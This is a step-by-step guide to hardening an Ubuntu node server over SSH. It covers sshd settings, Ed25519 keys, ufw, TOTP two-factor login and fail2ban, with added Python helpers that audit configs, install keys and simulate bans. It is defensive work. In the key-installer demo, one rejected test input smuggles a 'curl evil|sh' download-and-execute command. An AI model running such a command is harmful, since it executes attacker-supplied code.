# Pre-configure the Node Server

### Connect to the server <a href="#connect-to-the-server" id="connect-to-the-server"></a>

Using the key pair generated in the AWS console and an SSH client such as PuTTY, connect to your Ubuntu server. (Stock Ubuntu AMIs log you in as `ubuntu` rather than `root`; the steps below work either way.) If you are logged in as `root`, create a user-level account with admin privileges and use that instead, since working as `root` day to day is risky.

Create a new user. Replace `yourusername` with a username of your choice. You will be asked to create a strong password and to provide some other optional information.

```
sudo adduser <yourusername>
```

Grant admin rights to the new user by adding it to the sudo group. This will allow the user to perform actions with superuser privileges by typing sudo before commands.

```
sudo usermod -aG sudo <yourusername>
```

Optional: if you used an SSH key to connect to the instance as `root`, copy `root`'s SSH key data to the new user, otherwise key-based login as `<yourusername>` will fail once password login is disabled later in this guide.

```
sudo rsync --archive --chown=<yourusername>:<yourusername> ~/.ssh /home/<yourusername>
```

Finally, log out of `root` and log in as `<yourusername>`. Confirm that `sudo` works for the new account before continuing: later steps lock the `root` password and disable password login, so a broken account at this point can lock you out.

### Update the Server

Make sure the system is up to date with the latest software and security updates.

```
sudo apt update && sudo apt upgrade
sudo apt dist-upgrade && sudo apt autoremove
sudo reboot
```

Enable unattended security updates. The `dpkg-reconfigure` step asks whether stable updates should be downloaded and installed automatically; answer Yes.

```
sudo apt-get install unattended-upgrades
sudo dpkg-reconfigure -plow unattended-upgrades
```

**Optional**: Change the server's hostname with the following command:

```
sudo hostnamectl set-hostname <newNameHere>
```

## Secure the Server

This guide will follow a list of settings in the [CoinCashew](https://www.coincashew.com/coins/overview-ada/guide-how-to-build-a-haskell-stakepool-node/how-to-harden-ubuntu-server) guide. This is not a comprehensive list and you should investigate other security steps specific to your own setup and situation.

### SSH Configuration

This section edits your `sshd_config` file. Make a backup of the file before proceeding, and to understand each setting you are about to change, read the sshd help page:

```
man sshd_config
```

Change the SSH **Port** in the `sshd_config` file

```
sudo nano /etc/ssh/sshd_config
```

Find the line `#Port 22` remove the `#` and replace the number with the port number of your choice

```
Port <YourSSHPortNumber>
```

{% hint style="info" %}
***At this point you may want to configure your firewall to allow the new port number.*** See the **Firewall Configuration** section below. Also remember to update any AWS Security Groups if you have those configured.
{% endhint %}

Locate the line for **ChallengeResponseAuthentication** and set it to ‘no’. On OpenSSH 8.7 and later (Ubuntu 22.04 onwards) this keyword is a deprecated alias of **KbdInteractiveAuthentication**; set whichever name your file uses.

```
ChallengeResponseAuthentication no
```

Locate the line for **PasswordAuthentication** and set it to ‘no’

```
PasswordAuthentication no
```

Locate the line for **PermitRootLogin** and set it to ‘no’

```
PermitRootLogin no
```

Locate the line for **PermitEmptyPasswords** and set it to ‘no’

```
PermitEmptyPasswords no
```

Locate the line for **PubkeyAuthentication** and set it to ‘yes’. This is already the default, so it is stated explicitly for clarity; it is the `PasswordAuthentication no` setting above that leaves public keys as the only accepted login method.

```
PubkeyAuthentication yes
```

Change **ClientAliveInterval** to 300 and **ClientAliveCountMax** to 0. Be aware of what these do: after 300 seconds of silence the server sends a keepalive and disconnects a client that stops answering. A client that is connected but idle answers keepalives transparently, so this detects dead connections rather than enforcing an idle-session timeout. Since OpenSSH 8.2 a **ClientAliveCountMax** of 0 disables disconnection entirely, so on current releases use a value of at least 1 if you want unresponsive clients dropped.

```
ClientAliveInterval 300
ClientAliveCountMax 0
```

Save and close the file, then test the SSH config.

```
sudo sshd -t
```

If there are no errors then restart the SSH service

```
sudo systemctl restart sshd
```

On Ubuntu releases where sshd is socket-activated (22.10 and later) the listening port is governed by the `ssh.socket` unit, and a service restart alone can leave the daemon on port 22. After changing `Port` on those releases, run `sudo systemctl daemon-reload` and restart `ssh.socket`, then confirm the port actually in use with `sudo ss -tlnp | grep sshd`.

Open another PuTTY terminal and test connecting on the new SSH port before closing the existing terminal. The first session is your only way back in if the configuration is wrong, so keep it open until the new one works.
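As an added example (not part of the original guide, and not a tool shipped with OpenSSH), the following Python script checks an `sshd_config` for the values set in this section. It reproduces a rule that often bites people: sshd uses the **first** value it reads for a keyword, so a `PasswordAuthentication no` appended to the bottom of the file does nothing if an earlier line already says `yes`. It also treats `ChallengeResponseAuthentication` as the alias of `KbdInteractiveAuthentication`. It does not follow `Include` lines and ignores everything after the first `Match` block (assumptions noted in the code); the two sample configurations are constructed for the example.

```python
"""Added example: audit an sshd_config against the settings in this section.
Not OpenSSH code. Assumptions: Include files are not followed, and anything
after the first Match block is ignored (it is conditional, not global)."""
import re

# Pre-OpenSSH-8.7 name -> current name, so either spelling is checked.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}

# Values this section sets (the 2FA section later flips the last one to yes).
WANTED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
    "kbdinteractiveauthentication": "no",
}

# keyword, then '=' or whitespace, then the value
LINE_RE = re.compile(r"^(\S+?)\s*[= ]\s*(.+)$")


def parse_sshd_config(text):
    """Return {keyword: value} resolved the way sshd does: keywords are
    case-insensitive and the FIRST occurrence wins; later ones are ignored."""
    effective = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        if line.lower().startswith("match "):
            break                                 # rest of the file is conditional
        m = LINE_RE.match(line)
        if not m:
            continue
        key = m.group(1).lower()
        key = ALIASES.get(key, key)
        effective.setdefault(key, m.group(2).strip())  # first value wins
    return effective


def ssh_port(effective):
    """Port sshd will listen on; 22 is the compiled-in default."""
    return int(effective.get("port", "22"))


def audit(text, wanted=WANTED):
    """Return {keyword: effective value} for every wanted keyword that is not
    set to the hardened value. '<unset>' means the line is missing entirely,
    which leaves the compiled-in default (not always the safe one) in force."""
    effective = parse_sshd_config(text)
    findings = {}
    for key, good in wanted.items():
        actual = effective.get(key, "<unset>")
        if actual.lower() != good:
            findings[key] = actual
    return findings


# Constructed sample: an admin appended the hardened line without noticing the
# earlier 'yes', which is the one sshd actually honours.
WEAK_CONFIG = """\
Include /etc/ssh/sshd_config.d/*.conf
#Port 22
PasswordAuthentication yes
PermitRootLogin yes
PasswordAuthentication no
"""

# Constructed sample: the settings from this section, in either spelling.
HARDENED_CONFIG = """\
Port 2222
ChallengeResponseAuthentication no
PasswordAuthentication no
PermitRootLogin no
PermitEmptyPasswords no
PubkeyAuthentication yes
ClientAliveInterval 300
ClientAliveCountMax 0
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, "port", ssh_port(parse_sshd_config(cfg)), "findings", audit(cfg))
```

To run it against the real file, read `/etc/ssh/sshd_config` into `audit()`; an empty result means every keyword in `WANTED` resolves to the hardened value. On Ubuntu 22.04 and later also check `/etc/ssh/sshd_config.d/`, since the `Include` line at the top of the stock file pulls those in before anything you edit below it.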

#### Restricting access to specific users or IPs

{% hint style="warning" %}
**Optional Steps:** lock SSH down to a specific user and/or a specific source IP. Only perform these steps if you are confident your IP won’t change, because a changed IP will lock you out.
{% endhint %}

Open the SSHD config file again

```
sudo nano /etc/ssh/sshd_config
```

To restrict logins to specific users, add the following to the bottom of the file. Once **AllowUsers** is present, every account not listed is refused, so make sure your own account is included.

```
AllowUsers <SSH_User1> <SSH_User2>
```

Alternatively, to restrict a user to a specific source IP, add the following line instead. The part after `@` is matched against the connecting client’s address.

```
AllowUsers <SSH_User>@<Public_IP>
```

Save and close the file and restart SSHD

```
sudo systemctl restart sshd
```

#### Restrict Access Using IP Tables

Alternatively, you can use iptables to restrict access to the SSH port to a single IP or network. Enter the following at the command line (the `sudo` prefix is sufficient; you do not need a root shell). Rules added this way do not survive a reboot unless you save them, for example with the `iptables-persistent` package, and if you also use ufw (next section) it is clearer to express the restriction there than to mix the two.

```
sudo iptables -A INPUT -p tcp --dport <YOUR_SSH_PORT> -s <Your_Public_IP> -j ACCEPT
sudo iptables -A INPUT -p tcp --dport <YOUR_SSH_PORT> -j DROP
```

### Create a new Ed25519 key pair and replace the default AWS RSA 2048-bit key

The default AWS SSH key pair uses **RSA 2048-bit** keys. It is recommended to create another key pair using **Ed25519**, a modern signature algorithm with short keys that is designed to avoid common implementation pitfalls such as timing side channels. Follow the PuTTY key-generation guide [here](https://docs.digitalocean.com/products/droplets/how-to/add-ssh-keys/create-with-putty/). Ensure you set a strong passphrase on your private key: an unencrypted private key on a compromised laptop hands an attacker the server. Read up about Ed25519 [here](https://medium.com/risan/upgrade-your-ssh-key-to-ed25519-c6e8d60d3c54).

Then, once you have created the key, append the public key (a single line starting `ssh-ed25519`) to the `~/.ssh/authorized_keys` file of your login user. Do not use `sudo` here: if `root` creates the file it will be owned by `root`, and the permission fix below, which runs as your user, will fail on it.

```
nano ~/.ssh/authorized_keys
```

Save and close the file.

Test the new key works by opening a new SSH session via Putty and using the custom port you set earlier.

![](/files/-MeGXlqYzr4kRNx9DO_N)

Once confirmed, either back up and delete, or comment out (**`#`**), the previous RSA key’s line in the `authorized_keys` file, so that the AWS-generated key can no longer log in.

Ensure the `~/.ssh` directory and the `authorized_keys` file have the correct permissions by running the following command. It removes all group and other permissions; with sshd’s default **StrictModes** setting, keys in a directory or file that other users can write to are ignored.

```
chmod -R go= ~/.ssh
```

Check the permissions are set correctly

```
cd ~/.ssh
ls -l
```

![](/files/-MeGUol2cptvap7Rl-mc)
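As an added example (not from the guide), the following Python script performs the `authorized_keys` edit above programmatically: it refuses anything that is not a well-formed OpenSSH public key line (including a line whose declared key type does not match the type embedded in the base64 blob), appends the key only if it is not already present, and then applies and verifies the permissions `StrictModes` expects. The `ssh_home` argument and the sample key are constructed for the example so that it runs against a temporary directory rather than your real `~/.ssh`.

```python
"""Added example: safely install a public key into authorized_keys.
Not OpenSSH code. 'ssh_home' stands in for the login user's home directory
so the script can be exercised against a temporary directory."""
import base64
import os
import re
import stat
import struct
import tempfile

KEY_TYPES = {"ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
             "sk-ssh-ed25519@openssh.com"}
# type, base64 blob, optional comment; nothing else may follow the blob
PUBKEY_RE = re.compile(r"^(\S+) ([A-Za-z0-9+/]+={0,2})(?: (.*))?$")


def parse_pubkey(line):
    """Return (type, blob, comment) or None if the line is not a public key.
    The blob's first length-prefixed field must repeat the declared type."""
    m = PUBKEY_RE.match(line.strip())
    if not m or m.group(1) not in KEY_TYPES:
        return None
    ktype, blob, comment = m.group(1), m.group(2), m.group(3) or ""
    try:
        data = base64.b64decode(blob, validate=True)
    except ValueError:                      # binascii.Error is a ValueError
        return None
    n = int.from_bytes(data[:4], "big")
    if data[4:4 + n] != ktype.encode():
        return None
    return ktype, blob, comment


def install_pubkey(ssh_home, line):
    """Append the key to ssh_home/.ssh/authorized_keys.
    Returns 'added', 'present' (same type+blob already there) or 'rejected'."""
    parsed = parse_pubkey(line)
    if parsed is None:
        return "rejected"
    ssh_dir = os.path.join(ssh_home, ".ssh")
    path = os.path.join(ssh_dir, "authorized_keys")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    existing = []
    if os.path.exists(path):
        with open(path) as f:
            existing = [parse_pubkey(l) for l in f]
    # Compare type and blob only; the comment is free text and may differ.
    if any(e is not None and e[:2] == parsed[:2] for e in existing):
        result = "present"
    else:
        with open(path, "a") as f:
            f.write(line.strip() + "\n")
        result = "added"
    os.chmod(ssh_dir, 0o700)                # same effect as 'chmod -R go= ~/.ssh'
    os.chmod(path, 0o600)
    return result


def perms_ok(ssh_home):
    """True when neither ~/.ssh nor authorized_keys grants group/other access."""
    ssh_dir = os.path.join(ssh_home, ".ssh")
    for p in (ssh_dir, os.path.join(ssh_dir, "authorized_keys")):
        if os.stat(p).st_mode & (stat.S_IRWXG | stat.S_IRWXO):
            return False
    return True


def constructed_key(comment="user@laptop"):
    """A syntactically valid Ed25519 public key line built for this example
    (NOT a real key): wire format is len+type, then len+32-byte point."""
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(range(32))
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " " + comment


def run_demo():
    """Exercise the helpers in a temporary home directory."""
    home = tempfile.mkdtemp()
    key = constructed_key()
    results = {
        "first": install_pubkey(home, key),
        "again_other_comment": install_pubkey(home, key.replace("user@laptop", "backup-laptop")),
        "junk": install_pubkey(home, "ssh-ed25519 AAAA;curl evil|sh"),
        "type_mismatch": install_pubkey(home, key.replace("ssh-ed25519 ", "ssh-rsa ", 1)),
    }
    with open(os.path.join(home, ".ssh", "authorized_keys")) as f:
        results["lines"] = sum(1 for _ in f)
    results["perms_ok"] = perms_ok(home)
    return results


if __name__ == "__main__":
    print(run_demo())
```

Pasting a key by hand is where most mistakes happen (a wrapped line, a stray character, the wrong key type copied from a different machine), so the checks in `parse_pubkey` are the ones worth keeping even if you never automate the rest.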

### Disable the root account

Lock the `root` account’s password so that `root` can no longer log in with a password, on the console or over SSH. Key-based `root` login over SSH is already blocked by the `PermitRootLogin no` setting above. Do not delete the account itself; `sudo` and system services still depend on it.

```
sudo passwd -l root
```

### Firewall Configuration

ufw is a common Linux firewall front end which we will install.

Install the ufw package

```
sudo apt install ufw
```

Explicitly apply the defaults. Inbound traffic denied, outbound traffic allowed.

```
sudo ufw default deny incoming
sudo ufw default allow outgoing
```

Allow inbound traffic on `<YourSSHPortNumber>` as set in the **SSH Configuration** section above. SSH requires the TCP protocol.

```
sudo ufw allow <yourSSHportnumber>/tcp
```

{% hint style="warning" %}
**Optional:** you may also choose to lock down access to your specific public IP. However, be warned that if your public IP changes you may lose access. ufw applies the first matching rule, so if you add this rule, delete the broader allow rule for `<YourSSHPortNumber>` above (`sudo ufw status numbered`, then `sudo ufw delete <rule number>`); otherwise every address is still allowed.
{% endhint %}

```
sudo ufw allow proto tcp from <YourPublicIP> to any port <YourSSHPortNumber>
```

Deny inbound traffic on port 22/TCP. The default policy above already blocks it, but an explicit rule documents the intent and survives a later change of the default.

{% hint style="danger" %}
***Only perform this step after confirming you have connected over SSH using \<YourSSHPortNumber>***
{% endhint %}

```
sudo ufw deny 22/tcp
```

Enable the firewall and check to verify the rules have been correctly configured.

```
sudo ufw enable
sudo ufw status numbered
```

### Two-factor authentication (optional but encouraged)

Two-factor authentication adds an extra layer of security in the event your SSH private key is compromised: an attacker holding the key alone still cannot log in without the current time-based one-time code. Although we are installing the **Google Authenticator** PAM module, any TOTP app such as **Authy** can generate the codes.

{% hint style="danger" %}

#### **Warning!!** *Ensure you complete all these steps without closing the PuTTY terminal. If you close the PuTTY terminal before you complete all the steps you may not be able to log back in again.*

{% endhint %}

Install the Google Authenticator package

```
sudo apt install libpam-google-authenticator -y
```

Run `google-authenticator` as your login user, not with `sudo`, since it writes the secret to that user’s `~/.google_authenticator`.

```
google-authenticator
```

enter ‘y’ to the first prompt

```
Do you want authentication tokens to be time-based (y/n): y
```

A QR code will appear with a secret key, a number of emergency scratch codes and a prompt for further options. Open your **Google Authenticator** or **Authy** app and scan the QR code, or enter the secret key manually. Write down the emergency scratch codes and keep them somewhere safe: each one is a single-use login if you lose the phone.

The recommended settings for the subsequent prompts are:

```
Update the .google_authenticator file: yes
Disallow multiple uses: yes
Increase the original generation time limit: no
Enable rate-limiting: yes
```

Make a backup of the sshd configuration file

```
sudo cp /etc/pam.d/sshd /etc/pam.d/sshd.bak
```

Edit the `/etc/pam.d/sshd` file to make SSH use Google Authenticator

```
sudo nano /etc/pam.d/sshd
```

and add the two `auth` lines at the end of the file, after the existing `@include common-password` line (shown here for context). The `nullok` option lets users who have not yet run `google-authenticator` log in without a code; remove it once every account is enrolled.

```
@include common-password
auth required pam_google_authenticator.so nullok
auth required pam_permit.so
```

save and close the file.

Edit the SSH configuration file

```
sudo nano /etc/ssh/sshd_config
```

locate the `ChallengeResponseAuthentication` line that was set to ‘no’ earlier (on OpenSSH 8.7 and later the keyword is `KbdInteractiveAuthentication`) and update it to ‘yes’, so that sshd runs the PAM keyboard-interactive conversation that asks for the code

```
KbdInteractiveAuthentication yes
```

locate the `UsePAM` line and make sure it is set to ‘yes’

```
UsePAM yes
```

Save and close the file then restart the SSHD service

```
sudo systemctl restart sshd.service
```

{% hint style="warning" %}
2FA is not fully configured yet, but open another PuTTY window to confirm you can still log in. You should not be prompted for a two-factor code yet. **DO NOT** close your existing terminal.
{% endhint %}

Make SSH aware of 2FA by opening the SSH configuration file

```
sudo nano /etc/ssh/sshd_config
```

and add the following line to the bottom of the file. It makes sshd require a public key *and* a second method. Because `PasswordAuthentication` is ‘no’, the `publickey,password` combination can never complete, so in practice every login must present the key and then pass the keyboard-interactive (PAM, i.e. TOTP) step.

```
AuthenticationMethods publickey,password publickey,keyboard-interactive
```

save and close the file.

Open the PAM sshd configuration file

```
sudo nano /etc/pam.d/sshd
```

and comment out the following line by adding a `#` character at the start. `common-auth` is the Unix password check; with it disabled, the keyboard-interactive step asks only for the TOTP code rather than the account password.

```
#@include common-auth
```

Save and close the file, then restart SSH.

```
sudo systemctl restart sshd.service
```

Now open another PuTTY terminal session; after the key is accepted you should be asked to enter the two-factor code.

![](/files/-MeGawmmHZBnVCuAvVB3)
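As an added example (not code from the guide or from `libpam-google-authenticator`), the following Python shows what the PAM module does with the secret written to `~/.google_authenticator`: the six-digit code is HOTP (RFC 4226) computed over the current 30-second time step (RFC 6238), the module tolerates a small amount of clock skew, and with “disallow multiple uses” enabled it refuses a code whose time step has already been accepted. It uses only the standard library and is checked against the RFC test vectors (secret `12345678901234567890`); SHA-1, six digits and a 30-second step are the app’s defaults.

```python
"""Added example: how the codes used by libpam-google-authenticator are
derived and checked (RFC 4226 HOTP under RFC 6238 TOTP). Not the module's
code. Assumes the app defaults: HMAC-SHA1, 6 digits, 30-second step."""
import base64
import hashlib
import hmac
import struct


def hotp(secret, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, then
    'dynamic truncation' picks 4 bytes at an offset given by the last nibble."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, unix_time, step=30, digits=6):
    """RFC 6238: HOTP with counter = floor(unix_time / step)."""
    return hotp(secret, unix_time // step, digits)


def decode_secret(b32):
    """The secret in ~/.google_authenticator (and behind the QR code) is
    base32 without '=' padding; restore the padding before decoding."""
    s = b32.strip().replace(" ", "").upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def verify(secret, code, unix_time, window=1, last_used=-1, step=30, digits=6):
    """Return the time-step counter the code matched, or None.
    window:    accept codes from this many steps either side (clock skew;
               the google-authenticator 'time skew' prompt widens this).
    last_used: highest counter already accepted for this user; any counter
               at or below it is refused, which is what 'disallow multiple
               uses of the same token' enforces. Persist the returned counter."""
    if len(code) != digits or not code.isdigit():
        return None
    now = unix_time // step
    for c in range(now - window, now + window + 1):
        if c <= last_used:
            continue                                   # replay of a used step
        # constant-time compare so a wrong guess leaks no digit-by-digit timing
        if hmac.compare_digest(hotp(secret, c, digits), code):
            return c
    return None


if __name__ == "__main__":
    secret = decode_secret("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ")  # RFC test secret
    print(totp(secret, 59), verify(secret, totp(secret, 59), 59))
```

Two things follow from this that matter operationally: the server’s clock must be right (NTP), because a drift larger than `window` steps rejects every code, and the secret file is as sensitive as a password, which is why `google-authenticator` creates it mode 0400 and why it should never be copied to another host.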

### Kernel Live Patching

The Livepatch service addresses high and critical severity Linux kernel vulnerabilities, as identified by Ubuntu Security Notices and the CVE tracker, without a reboot. Because of limitations in the kernel livepatch technology, some kernel code paths cannot be safely patched while running, so a traditional kernel upgrade and reboot will still occasionally be necessary.

You will need to create an account at <https://login.ubuntu.com/>. The free tier allows installation on up to three machines. You will be given a subscription token, which can be found here <https://ubuntu.com/advantage>

Attach the token to your server and check the status. On current versions of `ubuntu-advantage-tools` the command is `pro` (`sudo pro attach <YOUR_TOKEN>`), with `ua` kept as a deprecated alias.

```
sudo ua attach <YOUR_TOKEN>
sudo ua status
```

### Secure Shared Memory

Shared memory (`/dev/shm`; `/run/shm` is a symlink to it on Ubuntu) can be used in an attack against a running service, for example to stage an executable in a world-writable location. You can restrict how it is mounted by modifying the **/etc/fstab** file. Be aware that the `ro` option below stops every process from creating shared memory segments and will break software that relies on them (databases and browsers, for instance); `noexec,nosuid,nodev` without `ro` is the usual alternative, blocking execution from and setuid escalation via that filesystem while leaving it usable.

Edit the fstab file

```
sudo nano /etc/fstab
```

Add the following line

```
tmpfs	/run/shm	tmpfs	ro,noexec,nosuid	0 0
```

Save and close the file, then reboot. After the reboot, confirm the options took effect with `findmnt /dev/shm`.

```
sudo reboot
```

### Install Fail2Ban

Fail2ban is an intrusion-prevention system that monitors log files and searches for particular patterns that correspond to a failed login attempt. If a certain number of failed logins are detected from a specific IP address (within a specified amount of time), fail2ban blocks access from that IP address.

Install fail2ban

```
sudo apt-get install fail2ban -y
```

Edit the config file

```
sudo nano /etc/fail2ban/jail.local
```

and add the following `[sshd]` jail (the file does not exist on a fresh install; creating it is correct, and it overrides `jail.conf`). Set `port` to your own SSH port, and set `ignoreip` to a space-separated list of addresses or CIDR ranges that must never be banned, such as your local daily laptop/PC, since a mistyped password from your own machine would otherwise lock you out. On releases without `/var/log/auth.log` (Ubuntu 24.04 does not install rsyslog by default), add `backend = systemd` to the jail so fail2ban reads the journal instead.

```
[sshd]
enabled = true
port = <22 or your random port number>
filter = sshd
logpath = /var/log/auth.log
maxretry = 3
# whitelisted IP addresses
ignoreip =  <list of whitelisted IP address, your local daily laptop/pc>
```

save and close the file.

Restart fail2ban and confirm the jail is active with `sudo fail2ban-client status sshd`

```
sudo systemctl restart fail2ban
```
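As an added example (not fail2ban’s own code), the following Python reproduces the decision the `[sshd]` jail above makes, run over a few constructed `auth.log` lines: a source address is banned once it produces `maxretry` failures within `findtime` seconds, unless it falls within `ignoreip`. The log lines, the addresses (RFC 5737 documentation ranges) and the year assumed for the timestamps are all invented for the example, and the two failure patterns are a small subset of what fail2ban’s `sshd` filter matches.

```python
"""Added example: the ban rule behind the [sshd] jail, over constructed logs.
Not fail2ban code. Assumptions: syslog-style timestamps with no year (a year
is supplied), IPv4 only, and only two of the sshd filter's failure patterns."""
import ipaddress
import re
from datetime import datetime

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?:Failed password for|Invalid user) .*?from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# Constructed sample log (not real traffic). 203.0.113.7 is a brute forcer,
# 198.51.100.9 is the admin's laptop fumbling a password before the key
# works, and 192.0.2.50 is a slow attacker spacing attempts 20 minutes apart.
SAMPLE_LOG = """\
Jun 10 10:00:01 node sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51000 ssh2
Jun 10 10:00:05 node sshd[1202]: Failed password for root from 203.0.113.7 port 51001 ssh2
Jun 10 10:00:09 node sshd[1203]: Invalid user oracle from 203.0.113.7 port 51002
Jun 10 10:00:12 node sshd[1204]: Failed password for invalid user test from 203.0.113.7 port 51003 ssh2
Jun 10 10:00:20 node sshd[1205]: Failed password for alice from 198.51.100.9 port 40000 ssh2
Jun 10 10:00:25 node sshd[1206]: Failed password for alice from 198.51.100.9 port 40001 ssh2
Jun 10 10:00:28 node sshd[1207]: Failed password for alice from 198.51.100.9 port 40002 ssh2
Jun 10 10:00:30 node sshd[1208]: Accepted publickey for alice from 198.51.100.9 port 40003 ssh2: ED25519 SHA256:constructed
Jun 10 10:00:40 node sshd[1209]: Failed password for bob from 192.0.2.50 port 33000 ssh2
Jun 10 10:20:41 node sshd[1210]: Failed password for bob from 192.0.2.50 port 33001 ssh2
Jun 10 10:40:42 node sshd[1211]: Failed password for bob from 192.0.2.50 port 33002 ssh2
"""


def parse_time(ts, year=2024):
    """auth.log timestamps carry no year; one is assumed for the example."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def find_bans(log, maxretry=3, findtime=600, ignoreip=()):
    """Return {ip: time of ban}. Only failures within findtime seconds of the
    newest one count, similar to fail2ban's sliding window."""
    nets = [ipaddress.ip_network(n, strict=False) for n in ignoreip]
    recent = {}     # ip -> timestamps of failures still inside the window
    banned = {}
    for line in log.splitlines():
        m = FAIL_RE.match(line)
        if not m:
            continue                                   # not a failure line
        ip, t = m.group("ip"), parse_time(m.group("ts"))
        if ip in banned:
            continue                                   # already banned
        if any(ipaddress.ip_address(ip) in n for n in nets):
            continue                                   # whitelisted by ignoreip
        window = [x for x in recent.get(ip, []) if (t - x).total_seconds() <= findtime]
        window.append(t)
        recent[ip] = window
        if len(window) >= maxretry:
            banned[ip] = t
    return banned


if __name__ == "__main__":
    print(find_bans(SAMPLE_LOG, ignoreip=["198.51.100.0/24"]))
```

The third case is the one to notice: with the default `findtime` of 10 minutes the slow attacker at `192.0.2.50` is never banned, while `findtime = 3600` catches it. Raising `findtime` (or lowering `maxretry`) trades a higher chance of banning yourself against catching low-and-slow guessing, which is why `ignoreip` matters.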

That concludes the first step in preparing your Node Server. Head to the next page to install Node Exporter.

## Sources:

[Digital Ocean MFA Setup Link](https://www.digitalocean.com/community/tutorials/how-to-set-up-multi-factor-authentication-for-ssh-on-ubuntu-18-04)

[ED25519 Reference](https://medium.com/risan/upgrade-your-ssh-key-to-ed25519-c6e8d60d3c54)

[Coin Cashew’s Hardening Ubuntu Guide](https://www.coincashew.com/coins/overview-ada/guide-how-to-build-a-haskell-stakepool-node/how-to-harden-ubuntu-server)

[Digital Ocean Ubuntu Open SSH Hardening Tips](https://www.digitalocean.com/community/tutorials/how-to-harden-openssh-on-ubuntu-18-04)

[How to Harden your Ubuntu 18.04 Server](https://medium.com/@BaneBiddix/how-to-harden-your-ubuntu-18-04-server-ffc4b6658fe7)

[Linux hardening security tips](https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/)

[Kernel Live Patching - Florian Pieper](https://github.com/fpieper/fpstaking/blob/main/docs/validator_guide.md)

